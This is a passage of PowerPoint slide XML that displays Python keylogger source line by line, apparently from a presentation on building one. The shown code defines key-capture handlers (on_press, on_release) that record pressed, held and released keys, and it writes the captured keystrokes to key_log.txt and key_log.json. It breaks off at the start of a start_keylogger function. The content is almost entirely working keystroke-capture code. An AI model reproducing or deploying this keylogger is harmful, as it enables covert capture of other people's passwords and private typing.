              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1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97778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45F31DD-911B-3712-9066-6A943F8AD6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="9646920" cy="6255559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
